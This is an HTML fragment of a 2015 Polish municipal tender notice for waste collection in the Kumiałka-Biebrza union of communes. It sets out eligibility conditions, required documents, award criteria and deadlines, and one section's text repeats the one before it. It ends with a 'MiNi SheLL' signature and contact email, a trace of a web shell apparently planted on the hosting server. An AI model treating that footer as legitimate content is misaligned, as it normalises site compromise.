<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie gmin: Janów i Korycin - członków Związku Gmin Kumiałka-Biebrza.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługi odbierania odpadów komunalnych z terenu nieruchomości w sposób ciągły przez okres minimum 12 miesięcy - o łącznej masie 800 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Zamawiający uzna powyższy warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości  (Dz. U. z  2013 r.  poz. 122) tj.:
1) odpowiednimi pojazdami i urządzeniami specjalistycznymi;
2) odpowiednią bazą magazynowo-transportową.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Zamawiający uzna powyższy warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości  (Dz. U. z  2013 r.  poz. 122) tj.:
1) odpowiednimi pojazdami i urządzeniami specjalistycznymi;
2) odpowiednią bazą magazynowo-transportową.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum  300 000, 00 zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zg-kumialka-biebrza.pbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek Gmin Kumiałka-Biebrza, ul. Słowiańska 14, 16-140 Korycin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2015 godzina 09:45, miejsce: Związek Gmin Kumiałka-Biebrza, ul. Słowiańska 14 (wiatrak), 16-140 Korycin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com